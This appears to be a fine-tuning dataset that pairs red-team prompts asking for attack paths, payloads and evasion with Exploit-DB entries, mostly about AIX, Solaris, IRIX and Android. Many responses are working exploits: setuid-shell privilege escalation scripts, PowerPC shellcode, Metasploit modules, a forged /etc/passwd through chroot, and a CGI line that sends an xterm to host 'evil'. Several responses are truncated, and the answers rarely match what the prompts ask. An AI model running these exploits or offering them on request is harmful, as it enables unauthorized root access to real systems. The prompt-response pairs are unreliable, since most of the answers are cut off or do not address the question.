instruction
stringlengths
87
229
response
stringlengths
192
60.5k
source
stringclasses
4 values
technique
stringlengths
5
109
Attacker perspective on AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow (Metasploit): Give 3+ methods with step-by-step instructions and code samples.
## # $Id: rpc_cmsd_opcode21.rb 10998 2010-11-11 22:43:22Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framewor...
EXPLOITDB
AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow (Metasploit)
Attacker perspective on AppleShare IP Mail Server 5.0.3 - Buffer Overflow: Give 4+ methods with step-by-step instructions and code samples.
source: https://www.securityfocus.com/bid/61/info There exists a buffer overflow in the Apple AppleShare IP Mail Server 5.0.3. If yu connect to the SMTP port and issue a HELO command with a large string (500 bytes or more) for a hostname the server, and possibly the whole machine, will crash. $ telnet some.where Tryi...
EXPLOITDB
AppleShare IP Mail Server 5.0.3 - Buffer Overflow
BSDI 4.0 tcpmux / inetd - Crash: What are 6 proven attack paths? Detail each with tools, commands, payloads.
source: https://www.securityfocus.com/bid/66/info A vulnerability exists in inetd which allows a remote user to crash inetd if the tcpmux service is not commented out of /etc/inetd.conf. The tcpmux service is defined in RFC1078 $ nmap -p 1-64000 -i <target host> It is also claimed inetd will die if the Windows 95/NT...
EXPLOITDB
BSDI 4.0 tcpmux / inetd - Crash
TARGET: Flussonic Media Server 4.1.25 < 4.3.3 - Arbitrary File Disclosure. Provide 3 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
Document Title: ============ Flussonic Media Server 4.3.3 Multiple Vulnerabilities Release Date: =========== June 29, 2014 Product & Service Introduction: ======================== Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP, MPEG-TS. Flussonic h...
EXPLOITDB
Flussonic Media Server 4.1.25 < 4.3.3 - Arbitrary File Disclosure
Attacker perspective on IBM AIX 4.3.1 - : Give 3+ methods with step-by-step instructions and code samples.
source: https://www.securityfocus.com/bid/520/info adb is the debugger that ships with IBM's AIX operating system. It is possible for a local user to cause a local denial of service through exploiting the version of adb shipped with AIX 4.2 through 4.3.1. The consequence of adb being exploited is the machine being hal...
EXPLOITDB
IBM AIX 4.3.1 -
IBM AIX 4.3.3/5.1/5.2 - exploitation: provide 6+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
source: https://www.securityfocus.com/bid/6840/info A buffer overflow vulnerability has been discovered in the libIM library available for the AIX 4.3, 5.1, 5.2 operating system. As a result it may be possible to overwrite sensitive memory in programs linked to the affected library. By identifying a linked application...
EXPLOITDB
IBM AIX 4.3.3/5.1/5.2 -
IBM AIX 5.x - exploitation: provide 4+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
source: https://www.securityfocus.com/bid/13909/info invscout is prone to a local buffer overflow vulnerability. This issue presents itself because the application fails to carry out boundary checks on user-supplied data from the command line. /usr/sbin/invscout `perl -e 'print "A" x 1024;'`
EXPLOITDB
IBM AIX 5.x -
PHP Hosting Directory 2.0 - Database Disclosure — Give 6 different attacker methodologies. For each: exact commands, payloads, and evasion.
#!/usr/bin/env python #-*- coding:cp1254 -*- ''' # Title : PHP Hosting Directory 2.0 Database Disclosure Exploit (.py) # Author : ZoRLu / http://inj3ct0r.com/author/577 # mail-msn : admin@yildirimordulari.com # Down. Script : - # Proof : http://img214.imageshack.us/img214/2407/directory...
EXPLOITDB
PHP Hosting Directory 2.0 - Database Disclosure
Red team: PHP Stock Management System 1.02 - Multiple Vulnerabilities. List 3 exploitation approaches with: reconnaissance, technique, PoC code.
# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty # Date : 9-9-2014 # Author : jsass # Vendor Homepage: http://www.posnic.com/ # Software Link: http://sourceforge.net/projects/stockmanagement/ # Version: 1.02 # Tested on: kali linux # Twitter : @KwSecurity # Group : Q8 GRAY HAT TEAM ###########...
EXPLOITDB
PHP Stock Management System 1.02 - Multiple Vulnerabilities
PointDev IDEAL Migration - Buffer Overflow (Metasploit) — Give 6 different attacker methodologies. For each: exact commands, payloads, and evasion.
## # $Id: ideal_migration_ipj.rb 10477 2010-09-25 11:59:02Z mc $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework...
EXPLOITDB
PointDev IDEAL Migration - Buffer Overflow (Metasploit)
RobotStats 1.0 - HTML Injection: What are 4 proven attack paths? Detail each with tools, commands, payloads.
# Title : RobotStats v1.0 HTML Injection Vulnerability # Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com # Home : http://milw00rm.com / its online # Twitter : https://twitter.com/milw00rm or @milw00rm # Date : 22.11.2014 # Demo : http://alpesoiseaux.free.fr/robotstats...
EXPLOITDB
RobotStats 1.0 - HTML Injection
Attacker perspective on AIX 3.x - bugfiler Arbitrary File Creation: Give 4+ methods with step-by-step instructions and code samples.
source: https://www.securityfocus.com/bid/1800/info A vulnerability exists in AIX 3.* versions of bugfiler, a utility which automates the process of reporting an filing system bugs. Bugfiler, installed setuid root, creates files in a directory specified by the user invoking the program (example: $/lib/bugfiler -b <use...
EXPLOITDB
AIX 3.x - bugfiler Arbitrary File Creation
Attacker perspective on AIX 4.2/4.3 - netstat -Z Statistic Clearing: Give 5+ methods with step-by-step instructions and code samples.
source: https://www.securityfocus.com/bid/1660/info A vulnerability exists in versions 4.x. x of AIX, from IBM. Any local user can utilize the -Z command to netstat, without needing to be root. This will cause interface statistics to be reset. This could potentially interfere with programs that track statistical infor...
EXPLOITDB
AIX 4.2/4.3 - netstat -Z Statistic Clearing
AIX 4.3.3/5.1 - Invscoutd Symbolic Link exploitation: provide 4+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
source: https://www.securityfocus.com/bid/9982/info Reportedly AIX invscoutd insecurely handles temporary files; this may allow a local attacker to destroy data on vulnerable system. This issue is due to a design error that allows a user to specify a log file that the process writes to while holding escalated privileg...
EXPLOITDB
AIX 4.3.3/5.1 - Invscoutd Symbolic Link
Red team: AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (1). List 5 exploitation approaches with: reconnaissance, technique, PoC code.
source: https://www.securityfocus.com/bid/9905/info getlvcb has been reported to be prone to a buffer overflow vulnerability. When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will tr...
EXPLOITDB
AIX 4.3.3/5.x - Getlvcb Command Line Argument Buffer Overflow (1)
Red team: AIX 4.3/5.1 - diagrpt Arbitrary Privileged Program Execution. List 4 exploitation approaches with: reconnaissance, technique, PoC code.
source: https://www.securityfocus.com/bid/2916/info AIX ships with a diagnostic reporting utility called 'diagrpt'. This utility is installed setuid root by default. When 'diagrpt' executes, it relies on an environment variable to locate another utility which it executes. This utility is executed by 'diagrpt' as root...
EXPLOITDB
AIX 4.3/5.1 - diagrpt Arbitrary Privileged Program Execution
AIX 4.3/5.1 < 5.3 - — Give 5 different attacker methodologies. For each: exact commands, payloads, and evasion.
mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat > /tmp/aap/bin/Dctrl << EOF #!/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh # milw0rm.com [2004-12-21]
EXPLOITDB
AIX 4.3/5.1 < 5.3 -
Red team: AIX 5.1 Bellmail - Local Race Condition. List 5 exploitation approaches with: reconnaissance, technique, PoC code.
-bash-2.05b$ -bash-2.05b$ cat x_aix5_bellmail.pl #!/usr/bin/perl # FileName: x_aix5_bellmail.pl # Exploit "Race condition vulnerability (BUGTRAQ ID: 8805)" of /usr/bin/bellmail # command on Aix5 to change any file owner to current user. # #Usage : x_aix5_bellmail.pl aim_file # aim_file : then file...
EXPLOITDB
AIX 5.1 Bellmail - Local Race Condition
Red team: AIX 5.3.0 - . List 5 exploitation approaches with: reconnaissance, technique, PoC code.
#!/usr/bin/sh # r00t exploit written for the invscout bug reported by Idefense labs # http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities # coded by ri0t exploitation is trivial but automated with this script # www.ri0tnet.net # # usage ./getr00t.sh :) # exploitation gives euid(root) from here g...
EXPLOITDB
AIX 5.3.0 -
AIX 7.1 - exploitation: provide 4+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
#!/bin/sh # # Exploit Title: AIX 7.1 lquerylv privilege escalation # Date: 2015.10.30 # Exploit Author: S2 Crew [Hungary] # Vendor Homepage: www.ibm.com # Software Link: - # Version: - # Tested on: AIX 7.1 (7100-02-03-1334) # CVE : CVE-2014-8904 # # From file writing to command execution ;) # export _DBGCMD_LQUERYLV=1 ...
EXPLOITDB
AIX 7.1 -
Attacker perspective on Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit): Give 6+ methods with step-by-step instructions and code samples.
## # $Id: cain_abel_4918_rdp.rb 11127 2010-11-24 19:35:38Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framewo...
EXPLOITDB
Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)
Digital Ultrix 4.0/4.1 - exploitation: provide 6+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
source: https://www.securityfocus.com/bid/17/info By default, /usr/bin/chroot is improperly installed in Ultrix versions 4.0 and 4.1. Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges. $ mkdir /tmp/etc $ echo root::0:0::/:/bin/sh > /tmp/etc/passwd $ mkdir /tmp/bin $ cp /...
EXPLOITDB
Digital Ultrix 4.0/4.1 -
GNU Make For IBM AIX 4.3.3 - CC Path Local Buffer Overflow: What are 6 proven attack paths? Detail each with tools, commands, payloads.
source: https://www.securityfocus.com/bid/9903/info GNU make for IBM AIX has been reported to be prone to a buffer overflow vulnerability, the issue is reported to exist due to a lack of sufficient boundary checks performed when reading the path to the CC compiler. Because the GNU make utility is reported to run with...
EXPLOITDB
GNU Make For IBM AIX 4.3.3 - CC Path Local Buffer Overflow
Red team: IBM AIX 3.2.5 - . List 3 exploitation approaches with: reconnaissance, technique, PoC code.
#source: https://www.securityfocus.com/bid/454/info # #Under older versions of AIX By changing the IFS enviroment variable to / setuid root programs that use system() or popen() can be fooled into running user provided programs. # #!/bin/csh # IFS hole in AIX3.2 rmail gives egid=mail. Apr. 1994 # Setup needed files. ...
EXPLOITDB
IBM AIX 3.2.5 -
TARGET: IBM AIX 4.2.1 - . Provide 6 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
source: https://www.securityfocus.com/bid/455/info There exists a vulnerability in the lquerypv command under AIX. By using the '-h' flaq, a user may read any file on the file system in hex format. /usr/sbin/lquerypv -h /pathtofilename
EXPLOITDB
IBM AIX 4.2.1 -
IBM AIX 4.2.1 - : What are 6 proven attack paths? Detail each with tools, commands, payloads.
source: https://www.securityfocus.com/bid/375/info The snap command is a diagnostic utlitiy for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger her...
EXPLOITDB
IBM AIX 4.2.1 -
IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (1): What are 4 proven attack paths? Detail each with tools, commands, payloads.
source: https://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerabilit...
EXPLOITDB
IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (1)
IBM AIX 4.3.x/5.1 - : What are 6 proven attack paths? Detail each with tools, commands, payloads.
source: https://www.securityfocus.com/bid/5885/info The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges. #!/usr/bin/perl # FileName: x_errpt_aix5.pl # Exploit command er...
EXPLOITDB
IBM AIX 4.3.x/5.1 -
IBM AIX 4.3.x/5.1 - — Give 4 different attacker methodologies. For each: exact commands, payloads, and evasion.
source: https://www.securityfocus.com/bid/7871/info Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated...
EXPLOITDB
IBM AIX 4.3.x/5.1 -
Attacker perspective on IBM AIX 4.x - : Give 5+ methods with step-by-step instructions and code samples.
source: https://www.securityfocus.com/bid/2034/info AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists that may allow elevation of user priviledges. The problem occurs in the enq program. It is reported that an overflow exists in the command line argument parsing, which could lead to ...
EXPLOITDB
IBM AIX 4.x -
IBM AIX 5.3 - — Give 4 different attacker methodologies. For each: exact commands, payloads, and evasion.
source: https://www.securityfocus.com/bid/16103/info IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulnerability may let the attacker gain unauthorized read access to shell scripts on the computer. -bash-3.00$ ls -l /tmp/k.sh -rwx------ 1 root system 79 2005-12-22 23:40 /tmp/k.sh -bash-3....
EXPLOITDB
IBM AIX 5.3 -
IBM AIX 5.3 - exploitation: provide 5+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
source: https://www.securityfocus.com/bid/16102/info IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see. -bash-3.00$./getCommand.new ../../../../../../etc/security/passwd...
EXPLOITDB
IBM AIX 5.3 -
IBM AIX 5.3 - : What are 3 proven attack paths? Detail each with tools, commands, payloads.
#!/bin/bash ################################################################# # _______ _________ _ # # ( ____ )\__ __/( ( /| # # | ( )| ) ( | \ ( | # # | (____)| | | | \ | | # # | __) | | | (\ \) | # # | (\ ( | | |...
EXPLOITDB
IBM AIX 5.3 -
Attacker perspective on IBM AIX 5.3 SP6 - : Give 4+ methods with step-by-step instructions and code samples.
#!/bin/sh # # 07/2007: public release # IBM AIX <= 5.3 sp6 # echo "-------------------------------" echo " AIX pioout Local Root Exploit " echo " By qaaz" echo "-------------------------------" cat >piolib.c <<_EOF_ #include <stdlib.h> #include <unistd.h> void init() __attribute__ ((constructor)); void init() { seteui...
EXPLOITDB
IBM AIX 5.3 SP6 -
IBM AIX 5.3.0 - : What are 3 proven attack paths? Detail each with tools, commands, payloads.
# #setlocale() exploit for aix 5.2 ( CVE-2006-4254 ) #thomas.pollet@gmail.com # from os import execve bof="a"*580+"bbbbccccdddd\x2f\xf2\x28\x2f" egg="\x60"*2350 shellcode=( # by intropy <at> caughq.org "\x7c\xa5\x2a\x79" # xor. r5,r5,r5 "\x40\x82\xff\xfd" # bnel <shellcode> "\x7f\xe8\x02\xa6"...
EXPLOITDB
IBM AIX 5.3.0 -
IBM AIX 5.3/6.1/7.1/7.2 - exploitation: provide 6+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
#!/usr/bin/sh # # AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04) # # This exploit takes advantage of known issues with debugging functions # within the AIX linker library. We are taking advantage of known # functionality, and focusing on badly coded SUID binaries which do n...
EXPLOITDB
IBM AIX 5.3/6.1/7.1/7.2 -
IBM AIX 5.6/6.1 - : What are 3 proven attack paths? Detail each with tools, commands, payloads.
#!/bin/sh # # $Id: raptor_libC,v 1.1 2009/09/10 15:08:04 raptor Exp $ # # raptor_libC - AIX arbitrary file overwrite via libC debug # Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net> # # Property of @ Mediaservice.net Srl Data Security Division # http://www.mediaservice.net/ http://lab.mediaservice.net/ # # *...
EXPLOITDB
IBM AIX 5.6/6.1 -
Attacker perspective on IBM AIX 5.x - : Give 5+ methods with step-by-step instructions and code samples.
source: https://www.securityfocus.com/bid/12041/info diag is reported prone to a local privilege escalation vulnerability. This issue is due to a failure of certain diag applications to properly implement security controls when executing an application specified by the 'DIAGNOSTICS' environment variable. A local atta...
EXPLOITDB
IBM AIX 5.x -
TARGET: IBM AIX 6.1.8 - . Provide 4 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
Vulnerability title: Privilege Escalation in IBM AIX CVE: CVE-2014-3977 Vendor: IBM Product: AIX Affected version: 6.1.8 and later Fixed version: N/A Reported by: Tim Brown Details: It has been identified that libodm allows privilege escalation via arbitrary file writes with elevated privileges (utilising SetGID and ...
EXPLOITDB
IBM AIX 6.1.8 -
TARGET: IBM AIX 6.1/7.1 - Local Privilege Escalation. Provide 5 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
# Exploit-DB Note: Screenshot provided by exploit author # #!/bin/sh # Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation # Date: 2013-09-24 # Exploit Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com> # Vendor Homepage: http://www.ibm.com # Software Link: http://www-03.ibm.com/systems/power/...
EXPLOITDB
IBM AIX 6.1/7.1 - Local Privilege Escalation
Red team: IBM AIX 6.1/7.1/7.2 - . List 4 exploitation approaches with: reconnaissance, technique, PoC code.
#!/usr/bin/sh # # CVE-2016-8972/bellmailroot.sh: IBM AIX Bellmail local root # # Affected versions: # AIX 6.1, 7.1, 7.2 # VIOS 2.2.x # # Fileset Lower Level Upper Level KEY # --------------------------------------------------------- # bos.net.tcp.client 6.1.9.0 6.1.9.200...
EXPLOITDB
IBM AIX 6.1/7.1/7.2 -
Red team: IBM AIX 6.1/7.1/7.2.0.2 - . List 3 exploitation approaches with: reconnaissance, technique, PoC code.
#!/usr/bin/sh # # AIX lsmcode local root exploit. # # Affected: AIX 6.1/7.1/7.2.0.2 # # Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/ # # lqueryroot.sh by @hxmonsegur [2016 //RSL] ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}'...
EXPLOITDB
IBM AIX 6.1/7.1/7.2.0.2 -
Red team: IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation. List 5 exploitation approaches with: reconnaissance, technique, PoC code.
soure: https://www.securityfocus.com/bid/287/info IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is c...
EXPLOITDB
IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation
Red team: IBM AIX High Availability Cluster Multiprocessing (HACMP) - Local Privilege Escalation. List 4 exploitation approaches with: reconnaissance, technique, PoC code.
IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0day Let's kill some more bugs today and force vendor improvement :) """ $ cat /tmp/su #!/bin/sh /bin/sh $ chmod +x /tmp/su $ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd # /usr/bin/whoami root """ References: https://en.wikipedia.org/wiki/IB...
EXPLOITDB
IBM AIX High Availability Cluster Multiprocessing (HACMP) - Local Privilege Escalation
Red team: SGI IRIX 5.1/5.2 - . List 5 exploitation approaches with: reconnaissance, technique, PoC code.
source: https://www.securityfocus.com/bid/468/info The sgihelp program, from SGI and included with IRIX 5.1 and 5.2, contains a vulnerability. sgihelp contains an option that allows a user to print to a command. Certain SGI utilities, including PrintStatus, printers, scanners, and a number of others, will call this pr...
EXPLOITDB
SGI IRIX 5.1/5.2 -
SunOS 4.1.1 - — Give 5 different attacker methodologies. For each: exact commands, payloads, and evasion.
source: https://www.securityfocus.com/bid/22/info This applies to sites that have installed Sun Source tapes only. The Sun distribution of sources (sunsrc) has an installation procedure which creates the directory /usr/release/bin and installs two setuid root files in it: makeinstall and winstall. These are both bina...
EXPLOITDB
SunOS 4.1.1 -
SunOS 4.1.3 - exploitation: provide 5+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
source: https://www.securityfocus.com/bid/59/info /etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem. $ /etc/crash ! sh
EXPLOITDB
SunOS 4.1.3 -
Xorg X11 Server (AIX) - Local Privilege Escalation — Give 6 different attacker methodologies. For each: exact commands, payloads, and evasion.
# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation # Date: 29/11/2018 # Exploit Author: @0xdono # Original Discovery and Exploit: Narendra Shinde # Vendor Homepage: https://www.x.org/ # Platform: AIX # Version: X Window System Version 7.1.1 # Fileset: X11.base.rte < 7.1.5.32 # Tested on: AIX 7.1 (6.x to ...
EXPLOITDB
Xorg X11 Server (AIX) - Local Privilege Escalation
Red team: AIX5l with FTP-Server - Hash Disclosure. List 5 exploitation approaches with: reconnaissance, technique, PoC code.
### AIXCOREDUMP.PL --- ### --== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =-- ### CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd ### THE RESULT FILE IS SCRAMBLED - SEEK FOR DES LOOKING CRYPTO KEYS ### SUCCESSFULLY TESTED ON IBM AIX 5.1 ### DISCOVERED & EXPLOITED BY KINGCOPE ##...
EXPLOITDB
AIX5l with FTP-Server - Hash Disclosure
Gordano NTMail 3.0/5.0 - SPAM Relay exploitation: provide 5+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
source: https://www.securityfocus.com/bid/297/info NTMail v3.X is susceptible to being used as a mail relay for SPAM or other unsolicited email. Connecting to the mail server (tcp25) and issuing a 'mail from' command with <> as the data will allow an unathorized user to relay email via this server. Gordano's own JUCE...
EXPLOITDB
Gordano NTMail 3.0/5.0 - SPAM Relay
TARGET: IBM AIX 3.2.5 - . Provide 4 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
source: https://www.securityfocus.com/bid/458/info A problem with the way login parses arguments as passed by rlogind that may allow access to the root account. %rlogin -froot targethost.com
EXPLOITDB
IBM AIX 3.2.5 -
IBM AIX 4.3.2 - — Give 4 different attacker methodologies. For each: exact commands, payloads, and evasion.
source: https://www.securityfocus.com/bid/679/info A remote buffer overflow vulnerability in AIX's ftpd allows remote users to obtain root access. #!/usr/bin/perl # *** Synnergy Networks # * Description: # # Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an # RS6000. (power) # This is an return int...
EXPLOITDB
IBM AIX 4.3.2 -
IRIX 6.4 - : What are 3 proven attack paths? Detail each with tools, commands, payloads.
source: https://www.securityfocus.com/bid/64/info There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018. $ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'
EXPLOITDB
IRIX 6.4 -
Stalker Internet Mail Server 1.6 - Remote Buffer Overflow: What are 5 proven attack paths? Detail each with tools, commands, payloads.
source: https://www.securityfocus.com/bid/62/info There exists a buffer overflow in the Stalker Internet Mail Server version 1.6. If you connect to the SMTP port and issue a HELO command with a large string (several hundred bytes) for a hostname the server, and possibly MacOS, will crash. 220-Stalker Internet Mail Se...
EXPLOITDB
Stalker Internet Mail Server 1.6 - Remote Buffer Overflow
ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) (Metasploit): What are 6 proven attack paths? Detail each with tools, commands, payloads.
## # $Id: rpc_ttdbserverd_realpath.rb 10998 2010-11-11 22:43:22Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/f...
EXPLOITDB
ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) (Metasploit)
Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities exploitation: provide 6+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
Bull Clusterwatch/Watchware is a VERY VERY OLD tool used by sysadmins to manage their AIX clusters. Marble effect in the web banner and questionable font: it smells the 90s ! Tool is mainly a web app with CGIs (shell scripts and binaries) and we have found three vulnerabilities in it: Trivial admin credentials Authe...
EXPLOITDB
Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities
Attacker perspective on FileExecutive 1 - Multiple Vulnerabilities: Give 3+ methods with step-by-step instructions and code samples.
============================================================================== [»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ] ============================================================================== [»] FileExecutive Multiple Vulnerabilities =======================...
EXPLOITDB
FileExecutive 1 - Multiple Vulnerabilities
Red team: OPMANAGER - Blind SQL Injection / XPath Injection. List 5 exploitation approaches with: reconnaissance, technique, PoC code.
*******************************Blind SQL/XPath injection in OPMANAGER***********************************88 # Exploit Title: Blind SQL/XPath injection in OPMANAGER # Date: 8-Dec-09 # Author: Asheesh Kumar Mani Tripathi # AKS IT Services # Software Link: http://www.manageengine.com/products/opmanager/download...
EXPLOITDB
OPMANAGER - Blind SQL Injection / XPath Injection
Attacker perspective on Trend Micro Interscan Messaging Security Suite - Persistent Cross-Site Scripting / Cross-Site Request Forgery: Give 3+ methods with step-by-step instructions and code samples.
# Exploit Title: Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF # Date: 13/09/2012 # Exploit Author: modpr0be (modpr0be[at]spentera.com) # Vendor Homepage: http://www.trendmicro.com # Software Link: http://www.trendmicro.com/ftp/products/interscan/IMSS_v7.1_Win_1394.zip # Version: 7.1-Build_Win32_13...
EXPLOITDB
Trend Micro Interscan Messaging Security Suite - Persistent Cross-Site Scripting / Cross-Site Request Forgery
Prima Access Control 2.3.35 - exploitation: provide 5+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# Exploit Title: Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting # Google Dork: NA # Date: 2019-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 2.3.35 # Tes...
EXPLOITDB
Prima Access Control 2.3.35 -
TARGET: 1Password < 7.0 - Denial of Service. Provide 4 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
############ Description ############ The 1Password application < 7.0 for Android is affected by a Denial Of Service vulnerability. By starting the activity com.agilebits.onepassword.filling.openyolo.OpenYoloDeleteActivity or com.agilebits.onepassword.filling.openyolo.OpenYoloRetrieveActivity from an external applica...
EXPLOITDB
1Password < 7.0 - Denial of Service
AirDroid 4.2.1.6 - Denial of Service — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
#!/bin/bash # ********************************************************************* # * Author: Marcelo Vázquez (aka s4vitar) * # * AirDroid Denial of Service (DoS) & System Crash + Forced Reboot * # ********************************************************************* # Exploit Title: A...
EXPLOITDB
AirDroid 4.2.1.6 - Denial of Service
AirMore 1.6.1 - Denial of Service (PoC): What are 5 proven attack paths? Detail each with tools, commands, payloads.
#!/usr/bin/python #coding: utf-8 # ************************************************************************ # * Author: Marcelo Vázquez (aka s4vitar) * # * AirMore 1.6.1 Remote Denial of Service (DoS) & System Freeze * # ***********************************************************...
EXPLOITDB
AirMore 1.6.1 - Denial of Service (PoC)
Attacker perspective on Android - : Give 3+ methods with step-by-step instructions and code samples.
The keystore binder service ("android.security.IKeystoreService") allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many SELinux contexts, including application contexts, but also unprivileged daemons s...
EXPLOITDB
Android -
Red team: Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN. List 4 exploitation approaches with: reconnaissance, technique, PoC code.
This bug report describes two ways in which an attacker can modify the contents of a read-only ashmem fd. I'm not sure at this point what the most interesting user of ashmem is in the current Android release, but there are various users, including Chrome and a bunch of utility classes. In AOSP master, there is even cod...
EXPLOITDB
Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN
TARGET: Android - binder Use-After-Free of VMA via race Between reclaim and munmap. Provide 5 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
The following bug report solely looks at the situation on the upstream master branch; while from a cursory look, at least the wahoo kernel also looks affected, I have only properly tested this on upstream master. There is a race condition between the direct reclaim path (enters binder through the binder_shrinker) and ...
EXPLOITDB
Android - binder Use-After-Free of VMA via race Between reclaim and munmap
Red team: Android - binder Use-After-Free via fdget() Optimization. List 3 exploitation approaches with: reconnaissance, technique, PoC code.
This bug report describes *two* different issues in different branches of the binder kernel code. The first issue is in the upstream Linux kernel, commit 7f3dc0088b98 ("binder: fix proc->files use-after-free"); the second issue is in the wahoo kernel (and maybe elsewhere? but at least the android common kernel for 4.4 ...
EXPLOITDB
Android - binder Use-After-Free via fdget() Optimization
Attacker perspective on Android - binder Use-After-Free via racy Initialization of ->allow_user_free: Give 5+ methods with step-by-step instructions and code samples.
The following bug report solely looks at the situation on the upstream master branch; while from a cursory look, at least the wahoo kernel also looks affected, I have only properly tested this on upstream master. The binder driver permits userspace to free buffers in the kernel-managed shared memory region by using th...
EXPLOITDB
Android - binder Use-After-Free via racy Initialization of ->allow_user_free
